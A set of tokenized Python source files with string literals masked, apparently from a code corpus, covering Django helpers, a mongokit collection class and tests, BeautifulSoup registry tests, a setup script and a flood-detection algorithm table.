<s> class PyleaseError ( Exception ) : <EOL> def __init__ ( self , message = '<STR_LIT>' , * args , ** kwargs ) : <EOL> super ( PyleaseError , self ) . __init__ ( * args , ** kwargs ) <EOL> self . message = message <EOL> class VersionSpecError ( PyleaseError ) : <EOL> pass <EOL> class ReleaseError ( PyleaseError ) : <EOL> pass <EOL> class UploadError ( PyleaseError ) : <EOL> pass </s>
<s> from datetime import date <EOL> from django . db import IntegrityError <EOL> from propaganda . models import Propaganda , Subscriber , Pamphlet <EOL> def generate_pamphlets ( propaganda = None , subscribers = None , delivery_date = None ) : <EOL> """<STR_LIT>""" <EOL> pamphlets = [ ] <EOL> email = propaganda or Propaganda . objects . latest ( '<STR_LIT:id>' ) <EOL> subscribers = subscribers or Subscriber . objects . filter ( active = True ) <EOL> delivery_date = delivery_date or date . today ( ) <EOL> for subscriber in subscribers : <EOL> try : <EOL> pamphlet = Pamphlet . objects . create ( propaganda = email , <EOL> subscriber = subscriber , delivery_date = delivery_date ) <EOL> except IntegrityError : <EOL> pass <EOL> else : <EOL> pamphlets . append ( pamphlet ) <EOL> return pamphlets </s>
<s> from optparse import OptionParser <EOL> from kahuna . abstract import AbsPlugin <EOL> from kahuna . utils . prettyprint import pprint_tiers <EOL> from kahuna . utils . prettyprint import pprint_vdcs <EOL> from org . jclouds . abiquo . predicates . cloud import VirtualDatacenterPredicates <EOL> from org . jclouds . abiquo . domain . exception import AbiquoException <EOL> from org . jclouds . rest import AuthorizationException <EOL> class VirtualDatacenterPlugin ( AbsPlugin ) : <EOL> """<STR_LIT>""" <EOL> def list ( self , args ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cloud = self . _context . getCloudService ( ) <EOL> vdcs = cloud . listVirtualDatacenters ( ) <EOL> pprint_vdcs ( vdcs ) <EOL> except ( AbiquoException , AuthorizationException ) , ex : <EOL> print "<STR_LIT>" % ex . getMessage ( ) <EOL> def tiers ( self , args ) : <EOL> """<STR_LIT>""" <EOL> parser = OptionParser ( usage = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" , dest = "<STR_LIT:name>" ) <EOL> ( options , args ) = parser . parse_args ( args ) <EOL> name = options . name <EOL> if not name : <EOL> parser . print_help ( ) <EOL> return <EOL> try : <EOL> cloud = self . _context . getCloudService ( ) <EOL> vdc = cloud . findVirtualDatacenter ( <EOL> VirtualDatacenterPredicates . name ( name ) ) <EOL> if vdc : <EOL> tiers = vdc . listStorageTiers ( ) <EOL> pprint_tiers ( tiers ) <EOL> else : <EOL> print "<STR_LIT>" % name <EOL> except ( AbiquoException , AuthorizationException ) , ex : <EOL> print "<STR_LIT>" % ex . getMessage ( ) <EOL> def load ( ) : <EOL> """<STR_LIT>""" <EOL> return VirtualDatacenterPlugin ( ) </s>
<s> def dunderkey ( * args ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( args ) <EOL> def dunder_partition ( key ) : <EOL> """<STR_LIT>""" <EOL> parts = key . rsplit ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> return tuple ( parts ) if len ( parts ) > <NUM_LIT:1> else ( parts [ <NUM_LIT:0> ] , None ) <EOL> def dunder_init ( key ) : <EOL> """<STR_LIT>""" <EOL> return dunder_partition ( key ) [ <NUM_LIT:0> ] <EOL> def dunder_last ( key ) : <EOL> """<STR_LIT>""" <EOL> return dunder_partition ( key ) [ <NUM_LIT:1> ] <EOL> def dunder_get ( _dict , key ) : <EOL> """<STR_LIT>""" <EOL> parts = key . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> try : <EOL> result = _dict [ parts [ <NUM_LIT:0> ] ] <EOL> except KeyError : <EOL> return None <EOL> else : <EOL> return result if len ( parts ) == <NUM_LIT:1> else dunder_get ( result , parts [ <NUM_LIT:1> ] ) <EOL> def undunder_keys ( _dict ) : <EOL> """<STR_LIT>""" <EOL> def f ( key , value ) : <EOL> parts = key . split ( '<STR_LIT>' ) <EOL> return { <EOL> parts [ <NUM_LIT:0> ] : value if len ( parts ) == <NUM_LIT:1> else f ( parts [ <NUM_LIT:1> ] , value ) <EOL> } <EOL> result = { } <EOL> for r in [ f ( k , v ) for k , v in _dict . items ( ) ] : <EOL> rk = list ( r . keys ( ) ) [ <NUM_LIT:0> ] <EOL> if rk not in result : <EOL> result . update ( r ) <EOL> else : <EOL> result [ rk ] . update ( r [ rk ] ) <EOL> return result <EOL> def dunder_truncate ( _dict ) : <EOL> """<STR_LIT>""" <EOL> keylist = list ( _dict . keys ( ) ) <EOL> def decide_key ( k , klist ) : <EOL> newkey = dunder_last ( k ) <EOL> return newkey if list ( map ( dunder_last , klist ) ) . count ( newkey ) == <NUM_LIT:1> else k <EOL> original_keys = [ decide_key ( key , keylist ) for key in keylist ] <EOL> return dict ( zip ( original_keys , _dict . values ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from django import template <EOL> from django . template . loader_tags import BlockNode , do_block <EOL> from django . conf import settings <EOL> register = template . Library ( ) <EOL> def set_repeated_blocks ( parser ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> parser . _repeated_blocks <EOL> except AttributeError : <EOL> parser . _repeated_blocks = { } <EOL> @ register . tag <EOL> def repeated_block ( parser , token ) : <EOL> try : <EOL> tag_name , block_name = token . split_contents ( ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError ( <EOL> '<STR_LIT>' . format ( <EOL> token . contents . split ( ) [ <NUM_LIT:0> ] ) ) <EOL> set_repeated_blocks ( parser ) <EOL> block_node = do_block ( parser , token ) <EOL> parser . _repeated_blocks [ block_name ] = block_node <EOL> return block_node <EOL> @ register . tag <EOL> def repeat ( parser , token ) : <EOL> try : <EOL> tag_name , block_name = token . split_contents ( ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError ( <EOL> '<STR_LIT>' . format ( <EOL> token . contents . split ( ) [ <NUM_LIT:0> ] ) ) <EOL> try : <EOL> block_node = parser . _repeated_blocks [ block_name ] <EOL> except ( AttributeError , KeyError ) : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" . format ( <EOL> block_name , tag_name ) ) <EOL> return block_node </s>
<s> from pymongo . collection import Collection as PymongoCollection <EOL> from mongokit . mongo_exceptions import MultipleResultsFound <EOL> from mongokit . cursor import Cursor <EOL> from warnings import warn <EOL> class Collection ( PymongoCollection ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . _documents = { } <EOL> self . _collections = { } <EOL> super ( Collection , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _registered_documents = self . database . connection . _registered_documents <EOL> def __getattr__ ( self , key ) : <EOL> if key in self . _registered_documents : <EOL> if not key in self . _documents : <EOL> self . _documents [ key ] = self . _registered_documents [ key ] ( collection = self ) <EOL> if hasattr ( self . _documents [ key ] , "<STR_LIT>" ) and self . _documents [ key ] . i18n : <EOL> self . _documents [ key ] ( ) <EOL> if self . _documents [ key ] . indexes : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % self . _documents [ key ] . _obj_class . __name__ , <EOL> DeprecationWarning ) <EOL> return self . _documents [ key ] <EOL> else : <EOL> newkey = u"<STR_LIT>" % ( self . name , key ) <EOL> if not newkey in self . _collections : <EOL> self . _collections [ newkey ] = Collection ( self . database , newkey ) <EOL> return self . _collections [ newkey ] <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> if "<STR_LIT:.>" not in self . __name : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> self . __name ) <EOL> name = self . __name . split ( "<STR_LIT:.>" ) [ - <NUM_LIT:1> ] <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , name ) ) <EOL> def find ( self , * args , ** kwargs ) : <EOL> if not '<STR_LIT>' in kwargs and hasattr ( self , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = self . 
slave_okay <EOL> if not '<STR_LIT>' in kwargs and hasattr ( self , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = self . read_preference <EOL> if not '<STR_LIT>' in kwargs and hasattr ( self , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = self . tag_sets <EOL> if not '<STR_LIT>' in kwargs and hasattr ( self , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = ( <EOL> self . secondary_acceptable_latency_ms <EOL> ) <EOL> return Cursor ( self , * args , ** kwargs ) <EOL> find . __doc__ = PymongoCollection . find . __doc__ + """<STR_LIT>""" <EOL> def find_and_modify ( self , * args , ** kwargs ) : <EOL> obj_class = kwargs . pop ( '<STR_LIT>' , None ) <EOL> doc = super ( Collection , self ) . find_and_modify ( * args , ** kwargs ) <EOL> if doc and obj_class : <EOL> return self . collection [ obj_class . __name__ ] ( doc ) <EOL> return doc <EOL> find_and_modify . __doc__ = PymongoCollection . find_and_modify . __doc__ + """<STR_LIT>""" <EOL> def get_from_id ( self , id ) : <EOL> """<STR_LIT>""" <EOL> return self . find_one ( { "<STR_LIT>" : id } ) <EOL> def one ( self , * args , ** kwargs ) : <EOL> bson_obj = self . find ( * args , ** kwargs ) <EOL> count = bson_obj . count ( ) <EOL> if count > <NUM_LIT:1> : <EOL> raise MultipleResultsFound ( "<STR_LIT>" % count ) <EOL> elif count == <NUM_LIT:1> : <EOL> return bson_obj . next ( ) <EOL> def find_random ( self ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> max = self . count ( ) <EOL> if max : <EOL> num = random . randint ( <NUM_LIT:0> , max - <NUM_LIT:1> ) <EOL> return self . find ( ) . skip ( num ) . next ( ) <EOL> def find_fulltext ( self , search , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . database . command ( "<STR_LIT:text>" , self . name , search = search , ** kwargs ) </s>
<s> import unittest <EOL> from mongokit import Document , Connection <EOL> class InheritedQueriesTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . connection = Connection ( safe = True ) <EOL> self . col = self . connection [ '<STR_LIT:test>' ] [ '<STR_LIT>' ] <EOL> def tearDown ( self ) : <EOL> self . connection . drop_database ( '<STR_LIT:test>' ) <EOL> def test_use_inherited_queries ( self ) : <EOL> @ self . connection . register <EOL> class A ( Document ) : <EOL> __database__ = '<STR_LIT:test>' <EOL> __collection__ = '<STR_LIT>' <EOL> structure = { <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . connection . A ( ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , '<STR_LIT:A>' ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . connection . B ( ) <EOL> self . assertEqual ( doc_b [ '<STR_LIT>' ] , '<STR_LIT:B>' ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . connection . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> self . assertTrue ( isinstance ( self . connection . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) <EOL> self . assertTrue ( isinstance ( self . connection . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) [ <NUM_LIT:0> ] , B ) ) <EOL> def test_inherited_queries_without___collection__ ( self ) : <EOL> @ self . connection . 
register <EOL> class A ( Document ) : <EOL> structure = { <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . col . A ( ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , '<STR_LIT:A>' ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . col . B ( ) <EOL> self . assertEqual ( doc_b [ '<STR_LIT>' ] , '<STR_LIT:B>' ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) [ <NUM_LIT:0> ] , B ) ) <EOL> def test_type_field_is_None ( self ) : <EOL> @ self . connection . register <EOL> class A ( Document ) : <EOL> type_field = None <EOL> structure = { <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . col . A ( ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , None ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . col . B ( ) <EOL> self . 
assertEqual ( doc_b [ '<STR_LIT>' ] , None ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , A ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , A ) ) <EOL> self . assertFalse ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> self . assertFalse ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) <EOL> def test_no__type ( self ) : <EOL> @ self . connection . register <EOL> class A ( Document ) : <EOL> structure = { <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . col . A ( ) <EOL> self . assertTrue ( '<STR_LIT>' not in doc_a ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . col . B ( ) <EOL> self . assertTrue ( '<STR_LIT>' not in doc_b ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , A ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , A ) ) <EOL> self . assertFalse ( isinstance ( self . col . A . 
find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> self . assertFalse ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) <EOL> def test_change_type_field ( self ) : <EOL> @ self . connection . register <EOL> class A ( Document ) : <EOL> type_field = '<STR_LIT>' <EOL> structure = { <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . col . A ( ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , None ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , '<STR_LIT:A>' ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . col . B ( ) <EOL> self . assertEqual ( doc_b [ '<STR_LIT>' ] , None ) <EOL> self . assertEqual ( doc_b [ '<STR_LIT>' ] , '<STR_LIT:B>' ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , A ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , A ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> self . assertTrue ( isinstance ( self . col . A . find ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) . next ( ) , B ) ) </s>
<s> import subprocess <EOL> import sys <EOL> from distutils . core import setup , Command <EOL> class TestCommand ( Command ) : <EOL> user_options = [ ] <EOL> def initialize_options ( self ) : <EOL> pass <EOL> def finalize_options ( self ) : <EOL> pass <EOL> def run ( self ) : <EOL> errno = subprocess . call ( [ sys . executable , '<STR_LIT>' ] ) <EOL> raise SystemExit ( errno ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' , ] , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> cmdclass = { '<STR_LIT:test>' : TestCommand } , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import warnings <EOL> from bs4 import BeautifulSoup <EOL> from bs4 . builder import ( <EOL> builder_registry as registry , <EOL> HTMLParserTreeBuilder , <EOL> TreeBuilderRegistry , <EOL> ) <EOL> try : <EOL> from bs4 . builder import HTML5TreeBuilder <EOL> HTML5LIB_PRESENT = True <EOL> except ImportError : <EOL> HTML5LIB_PRESENT = False <EOL> try : <EOL> from bs4 . builder import ( <EOL> LXMLTreeBuilderForXML , <EOL> LXMLTreeBuilder , <EOL> ) <EOL> LXML_PRESENT = True <EOL> except ImportError : <EOL> LXML_PRESENT = False <EOL> class BuiltInRegistryTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_combination ( self ) : <EOL> if LXML_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' , '<STR_LIT:html>' ) , <EOL> LXMLTreeBuilder ) <EOL> if LXML_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> LXMLTreeBuilderForXML ) <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT:strict>' , '<STR_LIT:html>' ) , <EOL> HTMLParserTreeBuilder ) <EOL> if HTML5LIB_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' , '<STR_LIT:html>' ) , <EOL> HTML5TreeBuilder ) <EOL> def test_lookup_by_markup_type ( self ) : <EOL> if LXML_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT:html>' ) , LXMLTreeBuilder ) <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' ) , LXMLTreeBuilderForXML ) <EOL> else : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' ) , None ) <EOL> if HTML5LIB_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT:html>' ) , HTML5TreeBuilder ) <EOL> else : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT:html>' ) , HTMLParserTreeBuilder ) <EOL> def test_named_library ( self ) : <EOL> if LXML_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> LXMLTreeBuilderForXML ) <EOL> self . assertEqual ( registry . 
lookup ( '<STR_LIT>' , '<STR_LIT:html>' ) , <EOL> LXMLTreeBuilder ) <EOL> if HTML5LIB_PRESENT : <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' ) , <EOL> HTML5TreeBuilder ) <EOL> self . assertEqual ( registry . lookup ( '<STR_LIT>' ) , <EOL> HTMLParserTreeBuilder ) <EOL> def test_beautifulsoup_constructor_does_lookup ( self ) : <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> BeautifulSoup ( "<STR_LIT>" , features = "<STR_LIT:html>" ) <EOL> BeautifulSoup ( "<STR_LIT>" , features = [ "<STR_LIT:html>" , "<STR_LIT>" ] ) <EOL> self . assertRaises ( ValueError , BeautifulSoup , <EOL> "<STR_LIT>" , features = "<STR_LIT>" ) <EOL> class RegistryTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . registry = TreeBuilderRegistry ( ) <EOL> def builder_for_features ( self , * feature_list ) : <EOL> cls = type ( '<STR_LIT>' + '<STR_LIT:_>' . join ( feature_list ) , <EOL> ( object , ) , { '<STR_LIT>' : feature_list } ) <EOL> self . registry . register ( cls ) <EOL> return cls <EOL> def test_register_with_no_features ( self ) : <EOL> builder = self . builder_for_features ( ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:foo>' ) , None ) <EOL> self . assertEqual ( self . registry . lookup ( ) , builder ) <EOL> def test_register_with_features_makes_lookup_succeed ( self ) : <EOL> builder = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:foo>' ) , builder ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:bar>' ) , builder ) <EOL> def test_lookup_fails_when_no_builder_implements_feature ( self ) : <EOL> builder = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT>' ) , None ) <EOL> def test_lookup_gets_most_recent_registration_when_no_feature_specified ( self ) : <EOL> builder1 = self . 
builder_for_features ( '<STR_LIT:foo>' ) <EOL> builder2 = self . builder_for_features ( '<STR_LIT:bar>' ) <EOL> self . assertEqual ( self . registry . lookup ( ) , builder2 ) <EOL> def test_lookup_fails_when_no_tree_builders_registered ( self ) : <EOL> self . assertEqual ( self . registry . lookup ( ) , None ) <EOL> def test_lookup_gets_most_recent_builder_supporting_all_features ( self ) : <EOL> has_one = self . builder_for_features ( '<STR_LIT:foo>' ) <EOL> has_the_other = self . builder_for_features ( '<STR_LIT:bar>' ) <EOL> has_both_early = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> has_both_late = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> lacks_one = self . builder_for_features ( '<STR_LIT:bar>' ) <EOL> has_the_other = self . builder_for_features ( '<STR_LIT:foo>' ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) , <EOL> has_both_late ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' ) , <EOL> has_both_early ) <EOL> def test_lookup_fails_when_cannot_reconcile_requested_features ( self ) : <EOL> builder1 = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> builder2 = self . builder_for_features ( '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> self . assertEqual ( self . registry . lookup ( '<STR_LIT:bar>' , '<STR_LIT>' ) , None ) </s>
<s> import ee <EOL> from adaboost import * <EOL> from dnns import * <EOL> from ee_classifiers import * <EOL> from misc_algorithms import * <EOL> from modis_utilities import * <EOL> from simple_modis_algorithms import * <EOL> import cmt . radar . active_contour <EOL> '''<STR_LIT>''' <EOL> EVI = <NUM_LIT:1> <EOL> XIAO = <NUM_LIT:2> <EOL> DIFFERENCE = <NUM_LIT:3> <EOL> CART = <NUM_LIT:4> <EOL> SVM = <NUM_LIT:5> <EOL> RANDOM_FORESTS = <NUM_LIT:6> <EOL> DNNS = <NUM_LIT:7> <EOL> DNNS_DEM = <NUM_LIT:8> <EOL> DIFFERENCE_HISTORY = <NUM_LIT:9> <EOL> DARTMOUTH = <NUM_LIT:10> <EOL> DNNS_REVISED = <NUM_LIT:11> <EOL> DEM_THRESHOLD = <NUM_LIT:12> <EOL> MARTINIS_TREE = <NUM_LIT> <EOL> DNNS_DIFF = <NUM_LIT> <EOL> DNNS_DIFF_DEM = <NUM_LIT:15> <EOL> DIFF_LEARNED = <NUM_LIT:16> <EOL> DART_LEARNED = <NUM_LIT> <EOL> FAI = <NUM_LIT> <EOL> FAI_LEARNED = <NUM_LIT> <EOL> MODNDWI = <NUM_LIT:20> <EOL> MODNDWI_LEARNED = <NUM_LIT> <EOL> ADABOOST = <NUM_LIT> <EOL> ADABOOST_LEARNED = <NUM_LIT> <EOL> ADABOOST_DEM = <NUM_LIT> <EOL> ACTIVE_CONTOUR = <NUM_LIT> <EOL> _ALGORITHMS = { <EOL> EVI : ( '<STR_LIT>' , evi , False , '<STR_LIT>' ) , <EOL> XIAO : ( '<STR_LIT>' , xiao , False , '<STR_LIT>' ) , <EOL> DIFFERENCE : ( '<STR_LIT>' , modis_diff , False , '<STR_LIT>' ) , <EOL> DIFF_LEARNED : ( '<STR_LIT>' , diff_learned , False , '<STR_LIT>' ) , <EOL> DARTMOUTH : ( '<STR_LIT>' , dartmouth , False , '<STR_LIT>' ) , <EOL> DART_LEARNED : ( '<STR_LIT>' , dart_learned , False , '<STR_LIT>' ) , <EOL> FAI : ( '<STR_LIT>' , fai , False , '<STR_LIT>' ) , <EOL> FAI_LEARNED : ( '<STR_LIT>' , fai_learned , False , '<STR_LIT>' ) , <EOL> MODNDWI : ( '<STR_LIT>' , mod_ndwi , False , '<STR_LIT>' ) , <EOL> MODNDWI_LEARNED : ( '<STR_LIT>' , mod_ndwi_learned , False , '<STR_LIT>' ) , <EOL> CART : ( '<STR_LIT>' , cart , False , '<STR_LIT>' ) , <EOL> SVM : ( '<STR_LIT>' , svm , False , '<STR_LIT>' ) , <EOL> RANDOM_FORESTS : ( '<STR_LIT>' , random_forests , False , '<STR_LIT>' ) , <EOL> DNNS : ( '<STR_LIT>' , dnns , True , 
